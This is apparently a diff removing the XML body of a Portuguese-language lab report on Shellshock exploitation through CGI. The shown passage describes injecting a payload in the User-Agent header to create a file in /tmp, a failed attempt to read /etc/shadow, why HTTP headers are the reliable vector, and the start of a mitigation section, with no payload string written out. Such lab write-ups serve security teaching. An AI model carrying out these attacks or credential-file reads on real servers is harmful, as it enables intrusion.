-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (para melhor rastreabilidade). (Inserir imagem: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>evidence_created_file.jpg</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> — posicionado imediatamente após a descrição do </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>payload</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>.)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Legenda sugerida</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>: “</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Payload</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> injetado no cabeçalho </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>User-Agent</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> para criar ficheiro em /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>tmp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (comando </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>curl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> mostrado).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Verificação da existência e conteúdo do ficheiro:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Após a criação, a presença e o conteúdo do ficheiro foram confirmados).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>(COLOCAR IMAGEM DE EXEMPLO)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> conteúdo/listagem do ficheiro /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>tmp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>/evidence_file.txt. (Inserir imagem: evidence_file_existence_and_content.jpg — posicionado imediatamente após a frase seguinte.)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Legenda sugerida</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>: “Confirmação da existência e conteúdo do ficheiro criado em /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>tmp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>.”</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Head3"/>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:b/>
-          <w:bCs w:val="0"/>
-          <w:i w:val="0"/>
-          <w:iCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:b/>
-          <w:bCs w:val="0"/>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:b/>
-          <w:bCs w:val="0"/>
-          <w:i w:val="0"/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>Acesso</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:b/>
-          <w:bCs w:val="0"/>
-          <w:i w:val="0"/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:b/>
-          <w:bCs w:val="0"/>
-          <w:i w:val="0"/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:b/>
-          <w:bCs w:val="0"/>
-          <w:i w:val="0"/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>/shadow</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Para"/>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Análise:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> O ficheiro /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>shadow</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> é restrito a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>root</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">; o processo web corre com privilégios reduzidos. Assim, tentativas diretas de leitura via </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Shellshock</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> resultam normalmente em erro de permissão.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Para"/>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>(COLOCAR IMAGEM DE EXEMPLO)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>um excerto de tentativa falhada (se existir) — ou apenas referenciar que a tentativa foi feita sem sucesso.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Conclusão:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Não foi possível obter /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>shadow</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a partir do contexto do serviço web, devido a permissões.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Head3"/>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:b/>
-          <w:bCs w:val="0"/>
-          <w:i w:val="0"/>
-          <w:iCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:b/>
-          <w:bCs w:val="0"/>
-          <w:i w:val="0"/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:b/>
-          <w:bCs w:val="0"/>
-          <w:i w:val="0"/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">Query string vs </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:b/>
-          <w:bCs w:val="0"/>
-          <w:i w:val="0"/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>cabeçalhos</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:b/>
-          <w:bCs w:val="0"/>
-          <w:i w:val="0"/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> HTTP</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Observação prática:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> A </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>query</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>string</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> é disponibilizada ao CGI na variável QUERY_STRING (por exemplo a=1&amp;b=2), como mostra evidence_query_string_on_header.txt. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>(COLOCAR IMAGEM DE EXEMPLO)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> pequeno excerto dessa saída para ilustrar (1–2 linhas). (Inserir bloco de texto: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>evidence_query_string_on_header.txt</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> — posicionar imediatamente após este parágrafo.)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Legenda sugerida:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> “Excerto de </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>getenv.cgi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> mostrando QUERY_STRING — ilustração de que a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>query</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>string</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> chega como única variável QUERY_STRING.”</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Conclusão prática:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> O </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>vector</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> fiável para </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Shellshock</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> em CGI é um cabeçalho HTTP (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>ex</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>User-Agent</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">) porque o CGI converte cabeçalhos em variáveis HTTP_*, as quais podem conter a definição de função maliciosa. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Colocar o </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>payload</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> na </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>query</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>string</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> raramente funciona; por isso, as explorações documentadas usaram cabeçalhos HTTP.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Head2"/>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Riscos identificados e medidas de mitigação</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Para"/>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Riscos</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>principais</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="19"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
